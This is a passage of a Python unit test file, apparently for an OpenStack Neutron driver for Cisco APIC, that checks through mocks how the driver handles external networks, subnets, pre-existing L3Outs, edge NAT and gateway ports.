mock.call(mgr.apic.fvAEPg, self._tenant(),
self._app_profile(), mocked.APIC_NETWORK,
nameAlias=mocked.APIC_NETWORK + '-name')]
self._check_call_list(expected_calls,
mgr.update_name_alias.call_args_list)
def test_create_external_network_postcommit(self):
net_ctx = self._get_network_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK,
TEST_SEGMENT1, external=True)
mgr = self.driver.apic_manager
self.driver.create_network_postcommit(net_ctx)
ctx_name = self._network_vrf_name(
nat_vrf=True, net_name=self._scoped_name(net_ctx.current['id']))
mgr.ensure_context_enforced.assert_called_once_with(
owner=self._tenant(vrf=True), ctx_id=ctx_name)
bd_name = "EXT-bd-%s" % self._scoped_name(mocked.APIC_NETWORK)
mgr.ensure_epg_created.assert_called_once_with(
self._tenant(),
"EXT-epg-%s" % self._scoped_name(mocked.APIC_NETWORK),
bd_name=bd_name, app_profile_name=self._app_profile(),
transaction=mock.ANY)
mgr.ensure_bd_created_on_apic.assert_called_once_with(
self._tenant(), bd_name,
ctx_name=ctx_name, ctx_owner=self._tenant(vrf=True),
transaction=mock.ANY)
mgr.set_l3out_for_bd.assert_called_once_with(
self._tenant(), bd_name, self._scoped_name(mocked.APIC_NETWORK),
transaction=mock.ANY)
expected_calls = [
mock.call(self._scoped_name(mocked.APIC_NETWORK),
owner=self._tenant(),
context=self._network_vrf_name(
nat_vrf=True,
net_name=self._scoped_name(net_ctx.current['id'])),
transaction=mock.ANY)]
self._check_call_list(
expected_calls,
mgr.ensure_external_routed_network_created.call_args_list)
mgr.set_domain_for_external_routed_network.assert_called_once_with(
self._scoped_name(mocked.APIC_NETWORK),
owner=self._tenant(), transaction='transaction')
mgr.ensure_logical_node_profile_created.assert_called_once_with(
self._scoped_name(mocked.APIC_NETWORK), mocked.APIC_EXT_SWITCH,
mocked.APIC_EXT_MODULE, mocked.APIC_EXT_PORT,
mocked.APIC_EXT_ENCAP, mocked.APIC_EXT_CIDR_EXPOSED,
owner=self._tenant(), transaction='transaction')
mgr.ensure_static_route_created.assert_called_once_with(
self._scoped_name(mocked.APIC_NETWORK), mocked.APIC_EXT_SWITCH,
mocked.APIC_EXT_GATEWAY_IP, transaction='transaction',
owner=self._tenant())
contract_name = "EXT-%s-allow-all" % mocked.APIC_NETWORK
mgr.create_tenant_filter.assert_called_once_with(
contract_name, owner=self._tenant(), entry="allow-all",
transaction=mock.ANY)
mgr.manage_contract_subject_bi_filter.assert_called_once_with(
contract_name, contract_name, contract_name,
owner=self._tenant(),
transaction=mock.ANY)
expected_calls = [
mock.call(self._scoped_name(mocked.APIC_NETWORK),
external_epg=mocked.APIC_EXT_EPG,
owner=self._tenant(),
transaction=mock.ANY)]
self._check_call_list(
expected_calls, mgr.ensure_external_epg_created.call_args_list)
expected_calls = [
mock.call(self._scoped_name(mocked.APIC_NETWORK), contract_name,
external_epg=mocked.APIC_EXT_EPG, provided=True,
owner=self._tenant(), transaction=mock.ANY),
mock.call(self._scoped_name(mocked.APIC_NETWORK), contract_name,
external_epg=mocked.APIC_EXT_EPG, provided=False,
owner=self._tenant(), transaction=mock.ANY)]
self._check_call_list(
expected_calls,
mgr.set_contract_for_external_epg.call_args_list)
def test_create_pre_external_network_postcommit(self):
net_ctx = self._get_network_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK_PRE,
TEST_SEGMENT1, external=True)
mgr = self.driver.apic_manager
self.driver._query_l3out_info = mock.Mock()
self.driver._query_l3out_info.return_value = {
'l3out_tenant': 'bar_tenant',
'vrf_name': 'bar_ctx',
'vrf_tenant': 'bar_tenant'}
self.driver.create_network_postcommit(net_ctx)
self.assertFalse(mgr.ensure_context_enforced.called)
self.assertFalse(mgr.ensure_external_routed_network_created.called)
self.assertFalse(mgr.set_domain_for_external_routed_network.called)
self.assertFalse(mgr.ensure_logical_node_profile_created.called)
self.assertFalse(mgr.ensure_static_route_created.called)
self.assertFalse(mgr.ensure_external_epg_created.called)
bd_name = "EXT-bd-%s" % self._scoped_name(net_ctx.current['name'],
preexisting=True)
l3out = self._scoped_name(net_ctx.current['name'], preexisting=True)
mgr.ensure_epg_created.assert_called_once_with(
self._tenant(),
"EXT-epg-%s" % self._scoped_name(net_ctx.current['name'],
preexisting=True),
bd_name=bd_name, app_profile_name=self._app_profile(),
transaction=mock.ANY)
mgr.ensure_bd_created_on_apic.assert_called_once_with(
self._tenant(), bd_name,
ctx_name='bar_ctx', ctx_owner='bar_tenant',
transaction=mock.ANY)
mgr.set_l3out_for_bd.assert_called_once_with(
self._tenant(), bd_name, l3out,
transaction=mock.ANY)
contract_name = "EXT-%s-allow-all" % mocked.APIC_NETWORK_PRE
mgr.create_tenant_filter.assert_called_once_with(
contract_name, owner='bar_tenant', entry="allow-all",
transaction=mock.ANY)
mgr.manage_contract_subject_bi_filter.assert_called_once_with(
contract_name, contract_name, contract_name,
owner='bar_tenant', transaction=mock.ANY)
expected_calls = [
mock.call(l3out, contract_name,
external_epg=mocked.APIC_EXT_EPG, provided=True,
owner='bar_tenant', transaction=mock.ANY),
mock.call(l3out, contract_name,
external_epg=mocked.APIC_EXT_EPG, provided=False,
owner='bar_tenant', transaction=mock.ANY)]
self._check_call_list(
expected_calls,
mgr.set_contract_for_external_epg.call_args_list)
def test_create_pre_edge_nat_external_network_postcommit(self):
net_ctx = self._get_network_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK_PRE_EDGE_NAT,
TEST_SEGMENT1, external=True)
mgr = self.driver.apic_manager
self.driver._query_l3out_info = mock.Mock()
self.driver._query_l3out_info.return_value = {
'l3out_tenant': 'bar_tenant',
'vrf_name': 'bar_ctx',
'vrf_tenant': 'bar_tenant'}
self.driver.create_network_postcommit(net_ctx)
self.assertFalse(mgr.ensure_context_enforced.called)
self.assertFalse(mgr.ensure_external_routed_network_created.called)
self.assertFalse(mgr.set_domain_for_external_routed_network.called)
self.assertFalse(mgr.ensure_logical_node_profile_created.called)
self.assertFalse(mgr.ensure_static_route_created.called)
self.assertFalse(mgr.ensure_external_epg_created.called)
self.assertFalse(mgr.ensure_epg_created.called)
self.assertFalse(mgr.ensure_bd_created_on_apic.called)
self.assertFalse(mgr.set_l3out_for_bd.called)
self.assertFalse(mgr.set_contract_for_epg.called)
self.assertFalse(mgr.ensure_subnet_created_on_apic.called)
def test_create_unknown_pre_external_network_postcommit(self):
net_ctx = self._get_network_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK_PRE,
TEST_SEGMENT1, external=True)
mgr = self.driver.apic_manager
self.driver._query_l3out_info = mock.Mock()
self.driver._query_l3out_info.return_value = None
self.assertRaises(
md.PreExistingL3OutNotFound,
self.driver.create_network_postcommit, net_ctx)
self.assertFalse(mgr.ensure_context_enforced.called)
self.assertFalse(mgr.ensure_external_routed_network_created.called)
self.assertFalse(mgr.set_domain_for_external_routed_network.called)
self.assertFalse(mgr.ensure_logical_node_profile_created.called)
self.assertFalse(mgr.ensure_static_route_created.called)
self.assertFalse(mgr.ensure_external_epg_created.called)
self.assertFalse(mgr.ensure_epg_created.called)
self.assertFalse(mgr.ensure_bd_created_on_apic.called)
self.assertFalse(mgr.create_tenant_filter.called)
self.assertFalse(mgr.manage_contract_subject_bi_filter.called)
self.assertFalse(mgr.set_contract_for_external_epg.called)
self.assertFalse(mgr.set_l3out_for_bd.called)
def test_delete_network_postcommit(self):
ctx = self._get_network_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK,
TEST_SEGMENT1)
mgr = self.driver.apic_manager
self.driver.delete_network_postcommit(ctx)
mgr.delete_bd_on_apic.assert_called_once_with(
self._tenant(), self._scoped_name(mocked.APIC_NETWORK),
transaction='transaction')
mgr.delete_epg_for_network.assert_called_once_with(
self._tenant(), mocked.APIC_NETWORK, transaction='transaction',
app_profile_name=self._app_profile())
def test_delete_route_leak_network_postcommit(self):
ctx = self._get_network_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK,
TEST_SEGMENT1,
route_leak=True)
mgr = self.driver.apic_manager
self.driver.delete_network_postcommit(ctx)
mgr.delete_bd_on_apic.assert_called_once_with(
self._tenant(), self._scoped_name(mocked.APIC_NETWORK),
transaction='transaction')
mgr.delete_epg_for_network.assert_called_once_with(
self._tenant(), mocked.APIC_NETWORK, transaction='transaction',
app_profile_name=self._app_profile())
if self.driver.vrf_per_router_tenants:
leak_l3out = "Leak-%s" % ctx.current['name']
mgr.delete_external_routed_network.assert_called_once_with(
leak_l3out, owner=self._tenant(vrf=True),
transaction='transaction')
def test_delete_external_network_postcommit(self):
ctx = self._get_network_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK,
TEST_SEGMENT1, external=True)
mgr = self.driver.apic_manager
self.driver.delete_network_postcommit(ctx)
self.assertEqual(1, mgr.delete_bd_on_apic.call_count)
self.assertEqual(1, mgr.delete_epg_for_network.call_count)
mgr.delete_external_routed_network.assert_called_once_with(
self._scoped_name(mocked.APIC_NETWORK), owner=self._tenant())
ctx_name = self._network_vrf_name(
nat_vrf=True, net_name=self._scoped_name(ctx.current['id']))
mgr.ensure_context_deleted.assert_called_once_with(
self._tenant(vrf=True), ctx_name, transaction=mock.ANY)
contract_name = "EXT-%s-allow-all" % mocked.APIC_NETWORK
mgr.delete_tenant_filter.assert_called_once_with(
contract_name, owner=self._tenant(), transaction=mock.ANY)
mgr.delete_contract.assert_called_once_with(
contract_name, owner=self._tenant(), transaction=mock.ANY)
def test_delete_pre_external_network_postcommit(self):
ctx = self._get_network_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK_PRE,
TEST_SEGMENT1, external=True)
mgr = self.driver.apic_manager
self.driver._query_l3out_info = mock.Mock()
self.driver._query_l3out_info.return_value = {
'l3out_tenant': 'bar_tenant',
'vrf_name': 'bar_ctx',
'vrf_tenant': 'bar_tenant'}
self.driver.delete_network_postcommit(ctx)
self.assertEqual(1, mgr.delete_bd_on_apic.call_count)
self.assertEqual(1, mgr.delete_epg_for_network.call_count)
self.assertFalse(mgr.delete_external_routed_network.called)
contract_name = "EXT-%s-allow-all" % mocked.APIC_NETWORK_PRE
l3out = self._scoped_name(ctx.current['name'], preexisting=True)
expected_calls = [
mock.call(l3out, contract_name,
external_epg=mocked.APIC_EXT_EPG, provided=True,
owner='bar_tenant', transaction=mock.ANY),
mock.call(l3out, contract_name,
external_epg=mocked.APIC_EXT_EPG, provided=False,
owner='bar_tenant', transaction=mock.ANY)]
self._check_call_list(
expected_calls,
mgr.unset_contract_for_external_epg.call_args_list)
mgr.delete_tenant_filter.assert_called_once_with(
contract_name, owner='bar_tenant', transaction=mock.ANY)
mgr.delete_contract.assert_called_once_with(
contract_name, owner='bar_tenant', transaction=mock.ANY)
def test_delete_pre_edge_nat_external_network_postcommit(self):
ctx = self._get_network_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK_PRE_EDGE_NAT,
TEST_SEGMENT1, external=True)
mgr = self.driver.apic_manager
self.driver._query_l3out_info = mock.Mock()
self.driver._query_l3out_info.return_value = {
'l3out_tenant': 'bar_tenant',
'vrf_name': 'bar_ctx',
'vrf_tenant': 'bar_tenant'}
self.driver.delete_network_postcommit(ctx)
self.assertFalse(mgr.delete_bd_on_apic.called)
self.assertFalse(mgr.delete_epg_for_network.called)
self.assertFalse(mgr.delete_external_routed_network.called)
contract_name = "EXT-%s-allow-all" % mocked.APIC_NETWORK_PRE_EDGE_NAT
l3out = self._scoped_name(ctx.current['name'], preexisting=True)
expected_calls = [
mock.call(l3out, contract_name,
external_epg=mocked.APIC_EXT_EPG, provided=True,
owner='bar_tenant', transaction=mock.ANY),
mock.call(l3out, contract_name,
external_epg=mocked.APIC_EXT_EPG, provided=False,
owner='bar_tenant', transaction=mock.ANY)]
self._check_call_list(
expected_calls,
mgr.unset_contract_for_external_epg.call_args_list)
mgr.delete_tenant_filter.assert_called_once_with(
contract_name, owner='bar_tenant', transaction=mock.ANY)
mgr.delete_contract.assert_called_once_with(
contract_name, owner='bar_tenant', transaction=mock.ANY)
def test_delete_external_no_nat_network_postcommit(self):
ctx = self._get_network_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK_NO_NAT,
TEST_SEGMENT1, external=True)
mgr = self.driver.apic_manager
self.driver.delete_network_postcommit(ctx)
mgr.delete_external_routed_network.assert_called_once_with(
self._scoped_name(mocked.APIC_NETWORK_NO_NAT),
owner=self._tenant())
def test_create_subnet_postcommit(self):
net_ctx = self._get_network_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK,
TEST_SEGMENT1)
subnet_ctx = self._get_subnet_context(SUBNET_GATEWAY,
SUBNET_CIDR,
net_ctx)
mgr = self.driver.apic_manager
self.driver.create_subnet_postcommit(subnet_ctx)
mgr.ensure_subnet_created_on_apic.assert_called_once_with(
self._tenant(), self._scoped_name(mocked.APIC_NETWORK),
'%s/%s' % (SUBNET_GATEWAY, SUBNET_NETMASK),
scope=None)
def test_create_subnet_nogw_postcommit(self):
net_ctx = self._get_network_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK,
TEST_SEGMENT1)
subnet_ctx = self._get_subnet_context(None,
SUBNET_CIDR,
net_ctx)
mgr = self.driver.apic_manager
self.driver.create_subnet_postcommit(subnet_ctx)
self.assertFalse(mgr.ensure_subnet_created_on_apic.called)
def test_create_external_subnet_postcommit(self):
net_ctx = self._get_network_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK,
external=True)
subnet_ctx = self._get_subnet_context(SUBNET_GATEWAY,
SUBNET_CIDR,
net_ctx)
mgr = self.driver.apic_manager
self.driver.create_subnet_postcommit(subnet_ctx)
mgr.ensure_subnet_created_on_apic.assert_called_once_with(
self._tenant(),
"EXT-bd-%s" % self._scoped_name(mocked.APIC_NETWORK),
'%s/%s' % (SUBNET_GATEWAY, SUBNET_NETMASK),
scope=None)
def test_create_edge_nat_external_subnet_postcommit(self):
net_ctx = self._get_network_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK_PRE_EDGE_NAT,
external=True)
subnet_ctx = self._get_subnet_context(SUBNET_GATEWAY,
SUBNET_CIDR,
net_ctx)
mgr = self.driver.apic_manager
self.driver.create_subnet_postcommit(subnet_ctx)
self.assertFalse(mgr.ensure_subnet_created_on_apic.called)
def test_delete_external_subnet_postcommit(self):
net_ctx = self._get_network_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK,
external=True)
subnet_ctx = self._get_subnet_context(SUBNET_GATEWAY,
SUBNET_CIDR,
net_ctx)
mgr = self.driver.apic_manager
self.driver.delete_subnet_postcommit(subnet_ctx)
mgr.ensure_subnet_deleted_on_apic.assert_called_once_with(
self._tenant(),
"EXT-bd-%s" % self._scoped_name(mocked.APIC_NETWORK),
'%s/%s' % (SUBNET_GATEWAY, SUBNET_NETMASK))
def test_delete_edge_nat_external_subnet_postcommit(self):
net_ctx = self._get_network_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK_PRE_EDGE_NAT,
external=True)
subnet_ctx = self._get_subnet_context(SUBNET_GATEWAY,
SUBNET_CIDR,
net_ctx)
mgr = self.driver.apic_manager
self.driver.delete_subnet_postcommit(subnet_ctx)
self.assertFalse(mgr.ensure_subnet_deleted_on_apic.called)
def test_update_external_subnet_postcommit(self):
net_ctx = self._get_network_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK,
external=True)
subnet_ctx1 = self._get_subnet_context(SUBNET_GATEWAY,
SUBNET_CIDR,
net_ctx)
subnet_ctx2 = self._get_subnet_context('10.3.1.1',
SUBNET_CIDR,
net_ctx)
subnet_ctx2.original = subnet_ctx1.current
mgr = self.driver.apic_manager
self.driver.update_subnet_postcommit(subnet_ctx2)
mgr.ensure_subnet_deleted_on_apic.assert_called_once_with(
self._tenant(),
"EXT-bd-%s" % self._scoped_name(mocked.APIC_NETWORK),
'%s/%s' % (SUBNET_GATEWAY, SUBNET_NETMASK),
transaction=mock.ANY)
mgr.ensure_subnet_created_on_apic.assert_called_once_with(
self._tenant(),
"EXT-bd-%s" % self._scoped_name(mocked.APIC_NETWORK),
'%s/%s' % ('10.3.1.1', SUBNET_NETMASK),
transaction=mock.ANY)
def test_update_edge_nat_external_subnet_postcommit(self):
net_ctx = self._get_network_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK_PRE_EDGE_NAT,
external=True)
subnet_ctx1 = self._get_subnet_context(SUBNET_GATEWAY,
SUBNET_CIDR,
net_ctx)
subnet_ctx2 = self._get_subnet_context('10.3.1.1',
SUBNET_CIDR,
net_ctx)
subnet_ctx2.original = subnet_ctx1.current
mgr = self.driver.apic_manager
self.driver.update_subnet_postcommit(subnet_ctx2)
self.assertFalse(mgr.ensure_subnet_deleted_on_apic.called)
self.assertFalse(mgr.ensure_subnet_created_on_apic.called)
def test_create_external_subnet_overlap(self):
net_ctx = self._get_network_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK,
external=True)
subnet_ctx = self._get_subnet_context(mocked.APIC_EXT_GATEWAY_IP,
mocked.APIC_EXT_CIDR_EXPOSED,
net_ctx)
raised = False
try:
self.driver.create_subnet_precommit(subnet_ctx)
except md.CidrOverlapsApicExternalSubnet:
raised = True
self.assertTrue(raised)
def test_port_notify_on_subnet_update(self):
net_ctx = self._get_network_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK,
seg_type='opflex')
subnet_ctx1 = self._get_subnet_context(SUBNET_GATEWAY,
SUBNET_CIDR,
net_ctx)
subnet_ctx2 = self._get_subnet_context('10.3.1.1',
SUBNET_CIDR,
net_ctx)
subnet_ctx2.original = subnet_ctx1.current
port_ctx = self._get_port_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK,
'vm1', net_ctx, HOST_ID1)
port_ctx.current['fixed_ips'] = [
{'subnet_id': subnet_ctx2.current['id'],
'ip_address': '10.3.1.42'}]
subnet_ctx2._plugin.get_ports.return_value = [port_ctx.current]
self.driver.update_subnet_postcommit(subnet_ctx2)
self.assertTrue(self.driver.notifier.port_update.called)
def test_query_l3out_info(self):
ctx1 = [{
'l3extRsEctx': {'attributes': {'tDn': 'uni/tn-foo/ctx-foobar'}}}]
mgr = self.driver.apic_manager
mgr.apic.l3extOut.get_subtree.return_value = ctx1
info = self.driver._query_l3out_info('l3out', 'bar_tenant')
self.assertEqual('bar_tenant', info['l3out_tenant'])
self.assertEqual('foobar', info['vrf_name'])
self.assertEqual('foo', info['vrf_tenant'])
mgr.apic.l3extOut.get_subtree.reset_mock()
mgr.apic.l3extOut.get_subtree.return_value = []
info = self.driver._query_l3out_info('l3out', 'bar_tenant')
self.assertEqual(None, info)
expected_calls = [
mock.call('bar_tenant', 'l3out'),
mock.call('common', 'l3out')]
self._check_call_list(
expected_calls, mgr.apic.l3extOut.get_subtree.call_args_list)
def test_nat_gw_port_precommit(self):
net_ctx = self._get_network_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK,
TEST_SEGMENT1, external=True)
port_ctx = self._get_port_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK,
'vm1', net_ctx, HOST_ID1, gw=True)
mgr = self.driver.apic_manager
mgr.get_router_contract.return_value = mocked.FakeDbContract(
mocked.APIC_CONTRACT)
self.driver.update_port_precommit(port_ctx)
def _test_no_nat_multiple_gw_port_precommit_exception(self, pre):
if pre:
self.external_network_dict[mocked.APIC_NETWORK_NO_NAT + '-name'][
'preexisting'] = 'True'
net_ctx = self._get_network_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK_NO_NAT,
TEST_SEGMENT1, external=True)
port_ctx = self._get_port_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK_NO_NAT,
'vm1', net_ctx, HOST_ID1, gw=True,
router_owner='r2')
self.driver._l3_plugin.get_routers.return_value = [
{'id': 'r1', 'tenant_id': 't1'},
{'id': 'r2', 'tenant_id': mocked.APIC_TENANT},
{'id': 'r3', 'tenant_id': mocked.APIC_TENANT}]
mgr = self.driver.apic_manager
mgr.get_router_contract.return_value = mocked.FakeDbContract(
mocked.APIC_CONTRACT)
if pre:
self.driver._query_l3out_info = mock.Mock()
self.driver._query_l3out_info.return_value = {
'l3out_tenant': self._tenant(),
'vrf_name': self._network_vrf_name(),
'vrf_tenant': self._tenant(vrf=True)}
if self.driver.per_tenant_context:
self.assertRaises(md.OnlyOneRouterPermittedIfNatDisabled,
self.driver.update_port_precommit,
port_ctx)
else:
self.driver.update_port_precommit(port_ctx)
del self.driver._l3_plugin.get_routers.return_value[0]
self.driver.update_port_precommit(port_ctx)
def test_no_nat_multiple_gw_port_precommit_exception(self):
self._test_no_nat_multiple_gw_port_precommit_exception(False)
def test_no_nat_multiple_pre_gw_port_precommit_exception(self):
self._test_no_nat_multiple_gw_port_precommit_exception(True)
def test_no_nat_pre_gw_port_precommit_l3out_wrong_tenant(self):
self.external_network_dict[mocked.APIC_NETWORK_NO_NAT + '-name'][
'preexisting'] = 'True'
net_ctx = self._get_network_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK_NO_NAT,
TEST_SEGMENT1, external=True)
port_ctx = self._get_port_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK_NO_NAT,
'vm1', net_ctx, HOST_ID1, gw=True)
mgr = self.driver.apic_manager
mgr.get_router_contract.return_value = mocked.FakeDbContract(
mocked.APIC_CONTRACT)
self.driver._query_l3out_info = mock.Mock()
self.driver._query_l3out_info.return_value = {
'l3out_tenant': 'bar_tenant',
'vrf_name': 'bar_ctx',
'vrf_tenant': 'bar_tenant'}
if self.driver.per_tenant_context or self.driver.single_tenant_mode:
self.assertRaises(md.PreExistingL3OutInIncorrectTenant,
self.driver.update_port_precommit,
port_ctx)
else:
self.driver.update_port_precommit(port_ctx)
def test_pre_gw_port_precommit_l3out_not_exist(self):
net_ctx = self._get_network_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK_PRE,
TEST_SEGMENT1, external=True)
port_ctx = self._get_port_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK_PRE,
'vm1', net_ctx, HOST_ID1, gw=True)
mgr = self.driver.apic_manager
mgr.get_router_contract.return_value = mocked.FakeDbContract(
mocked.APIC_CONTRACT)
self.driver._query_l3out_info = mock.Mock()
self.driver._query_l3out_info.return_value = None
self.assertRaises(md.PreExistingL3OutNotFound,
self.driver.update_port_precommit,
port_ctx)
def test_gw_port_precommit_l3out_edge_nat_invalid_vlan_range(self):
self.driver.l3out_vlan_alloc.l3out_vlan_ranges = {}
net_ctx = self._get_network_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK_EDGE_NAT,
TEST_SEGMENT1, external=True)
port_ctx = self._get_port_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK_EDGE_NAT,
'vm1', net_ctx, HOST_ID1, gw=True)
mgr = self.driver.apic_manager
mgr.get_router_contract.return_value = mocked.FakeDbContract(
mocked.APIC_CONTRACT)
self.assertRaises(md.EdgeNatBadVlanRange,
self.driver.update_port_precommit,
port_ctx)
del (self.external_network_dict[mocked.APIC_NETWORK_EDGE_NAT + '-name']
['vlan_range'])
self.assertRaises(md.EdgeNatVlanRangeNotFound,
self.driver.update_port_precommit,
port_ctx)
def test_pre_gw_port_precommit_l3out_edge_nat_wrong_IF_type(self):
net_ctx = self._get_network_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK_PRE_EDGE_NAT,
TEST_SEGMENT1, external=True)
port_ctx = self._get_port_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK_PRE_EDGE_NAT,
'vm1', net_ctx, HOST_ID1, gw=True)
mgr = self.driver.apic_manager
mgr.get_router_contract.return_value = mocked.FakeDbContract(
mocked.APIC_CONTRACT)
self.driver._query_l3out_info = mock.Mock()
self.driver._query_l3out_info.return_value = {
'l3out_tenant': 'bar_tenant',
'vrf_name': 'bar_ctx',
'vrf_tenant': 'bar_tenant',
'l3out': [{u'l3extLNodeP':
{u'attributes':
{u'dn':
u'uni/tn-common/out-supported/lnodep-Leaf3-4_NP'},
u'children': [{u'l3extLIfP':
{u'children': [{u'l3extRsPathL3OutAtt':
{u'attributes':
{u'ifInstT': u'l3-port'
}}}]}}]}}]}
self.assertRaises(md.EdgeNatWrongL3OutIFType,
self.driver.update_port_precommit,
port_ctx)
def test_pre_gw_port_precommit_l3out_edge_nat_wrong_OSPF_auth(self):
net_ctx = self._get_network_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK_PRE_EDGE_NAT,
TEST_SEGMENT1, external=True)
port_ctx = self._get_port_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK_PRE_EDGE_NAT,
'vm1', net_ctx, HOST_ID1, gw=True)
mgr = self.driver.apic_manager
mgr.get_router_contract.return_value = mocked.FakeDbContract(
mocked.APIC_CONTRACT)
self.driver._query_l3out_info = mock.Mock()
self.driver._query_l3out_info.return_value = {
'l3out_tenant': 'bar_tenant',
'vrf_name': 'bar_ctx',
'vrf_tenant': 'bar_tenant',
'l3out': [{u'l3extLNodeP':
{u'attributes':
{u'dn':
u'uni/tn-common/out-supported/lnodep-Leaf3-4_NP'},
u'children': [{u'l3extLIfP':
{u'children': [{u'ospfIfP':
{u'attributes':
{u'authType': u'simple'
}}}]}}]}}]}
self.assertRaises(md.EdgeNatWrongL3OutAuthTypeForOSPF,
self.driver.update_port_precommit,
port_ctx)
def test_pre_gw_port_precommit_l3out_edge_nat_wrong_BGP_auth(self):
net_ctx = self._get_network_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK_PRE_EDGE_NAT,
TEST_SEGMENT1, external=True)
port_ctx = self._get_port_context(mocked.APIC_TENANT,
mocked.APIC_NETWORK_PRE_EDGE_NAT,
'vm1', net_ctx, HOST_ID1, gw=True)
mgr = self.driver.apic_manager
mgr.get_router_contract.return_value = mocked.FakeDbContract(
mocked.APIC_CONTRACT)
self.driver._query_l3out_info = mock.Mock()
self.driver._query_l3out_info.return_value = {
'l3out_tenant': 'bar_tenant',
'vrf_name': 'bar_ctx',
'vrf_tenant': 'bar_tenant',
'l3out': [{u'l3extLNodeP':
{u'attributes':
{u'dn':
u'uni/tn-common/out-supported/lnodep-Leaf3-4_NP'},
u'children': [{u'l3extLIfP':
{u'children': [{u'l3extRsNodeL3OutAtt':
{u'attributes':
{u'type': u'sha1'}}},
{u'bfdIfP':
{u'attributes':
{u'type': u'sha1'}}},
{u'l3extRsNodeL3OutAtt':
{u'attributes':
{u'type': u'sha1'}}}]}}
]}}]}
self.assertRaises(md.EdgeNatWrongL3OutAuthTypeForBGP,
self.driver.update_port_precommit,
port_ctx)
# try again with a good input
self.driver._query_l3out_info.return_value['l3out'] = (
[{u'l3extLNodeP':
{u'attributes':
{u'dn': u'uni/tn-common/out-supported/lnodep-Leaf3-4_NP'},
u'children': [{u'l3extLIfP':
{u'children': [{u'l3extRsNodeL3OutAtt':
{u'attributes':
{u'type': u'sha1'}}},
{u'bfdIfP':
{u'attributes':
{u'type': u'none'}}},
{u'l3extRsNodeL3OutAtt':
{u'attributes':
{u'type': u'sha1'}}}]}}]}}])
self.driver.update_port_precommit(port_ctx)
def _setup_multiple_routers(self, ext_net_name, net_ctx):
routers = [{'id': 'r1', 'tenant_id': 't1'},
{'id': 'r2', 'tenant_id': 't1'},
{'id': 'r3', 'tenant_id': 't2'}]
def get_router(ctx, id):
for r in routers:
if r['id'] == id:
return r
def get_routers(ctx, filters):
tenants = filters.get('tenant_id', [])
return [r for r in routers
if (not tenants or r['tenant_id'] in tenants)]
self.driver._l3_plugin.get_router = get_router
self.driver._l3_plugin.get_routers = get_routers
gw_ports = [
self._get_port_context(mocked.APIC_TENANT,
ext_net_name,
'gw', net_ctx, HOST_ID1, gw=True,
router_owner=r['id'])
for r in routers]
def get_ports(ctx, filters):
devices = filters.get('device_id', [])
return [p.current for p in gw_ports
if (not devices or p.current['device_id'] in devices)]
for i in xrange(len(gw_ports)):
gw_ports[i].current['id'] += i
gw_ports[i]._plugin.get_ports = get_ports
if self.driver.vrf_per_router_tenants:
self.driver.vrf_per_router_tenants.extend(['t1', 't2'])
return gw_ports
def _test_delete_gw_port_multiple_postcommit(self, pre):
if pre:
ext_net_name = mocked.APIC_NETWORK_PRE
ext_epg = self._scoped_name(mocked.APIC_EXT_EPG,
preexisting=True)
else:
ext_net_name = mocked.APIC_NETWORK
ext_epg = mocked.APIC_EXT_EPG
shadow_ext_epg = "Shd-%s" % ext_epg
net_ctx = self._get_network_context(mocked.APIC_TENANT,
ext_net_name,
TEST_SEGMENT1, external=True)
gw_ports = self._setup_multiple_routers(ext_net_name, net_ctx)
self.driver._delete_path_if_last = mock.Mock()
mgr = self.driver.apic_manager
# Delete first GW port
self.driver.delete_port_postcommit(gw_ports[0])
vrf_pfx = ('%s-' % gw_ports[0]._port['device_id']
if self.driver.vrf_per_router_tenants else '')
if self.driver.single_tenant_mode and self.driver.per_tenant_context:
shadow_l3out = (
"Shd-%s" % self._scoped_name(vrf_pfx + ext_net_name,
tenant='t1'))
else:
shadow_l3out = "Shd-%s" % (vrf_pfx + ext_net_name)
if self.driver.vrf_per_router_tenants:
mgr.delete_external_routed_network.assert_called_once_with(
shadow_l3out, owner=self._tenant(ext_nat=True,
neutron_tenant='t1'))
else:
self.assertFalse(mgr.delete_external_routed_network.called)
exp_calls = [
mock.call(shadow_l3out,
'contract-r1',
external_epg=shadow_ext_epg,
owner=self._tenant(ext_nat=True,
neutron_tenant='t1'),
provided=True),
mock.call(shadow_l3out,
'contract-r1',
external_epg=shadow_ext_epg,
owner=self._tenant(ext_nat=True,
neutron_tenant='t1'),
provided=False)
]
self._check_call_list(
exp_calls, mgr.unset_contract_for_external_epg.call_args_list)
del gw_ports[0]
# Delete second GW port
mgr.delete_external_routed_network.reset_mock()
mgr.unset_contract_for_external_epg.reset_mock()
self.driver.delete_port_postcommit(gw_ports[0])
vrf_pfx = ('%s-' % gw_ports[0]._port['device_id']
if self.driver.vrf_per_router_tenants else '')
